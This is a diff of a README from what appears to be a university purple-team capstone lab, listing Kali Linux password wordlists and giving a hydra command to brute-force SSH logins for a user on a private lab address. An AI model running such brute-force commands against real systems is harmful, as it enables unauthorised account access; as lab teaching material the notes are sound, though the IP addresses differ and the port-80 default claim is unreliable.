Jay-Idrees/UPenn-CyberSecurity-Purple-Team-Defense-Hack-and-Attack-Mitigation-Capstone/readme.md

 - `ssh michael@192.168.1.10` reveals that it requires a password.
 We can use hydra to brute force it while attempting to connect to SSH

+> ### Important word lists for password cracking

 - It is helpful to know where sample wordlist are in Kali Linux.
 While working on this project I have learnt that there are at least 3 reference lists that every cybersecurity expert should be familiar with.
 These lists are composed of commonly used passwords

 **1. `ls /usr//share/wordlists/rockyou.txt`**

 **2. `ls /usr/share/john/password.lst`**

-**3.`/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`** Here the dirbuster directory contains multiple lists, but medium one shown here is just one of the many options
+**3.`ls /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`** Here the dirbuster directory contains multiple lists, but medium one shown here is just one of the many options

 - `hydra -l michael -P /usr/share/wordlists/rockyou.txt  ssh://192.168.1.110 -t 4` Here we can also type just the ip alone followed by ssh like: `192.168.1.110 ssh` its equal to `ssh://192.168.1.110`, `-l` is for login, `-P` is for password an `t 4` is the speed.
 Note that if you do not specify ssh then it will brute force on port 80 which is meant for http and will be incorrect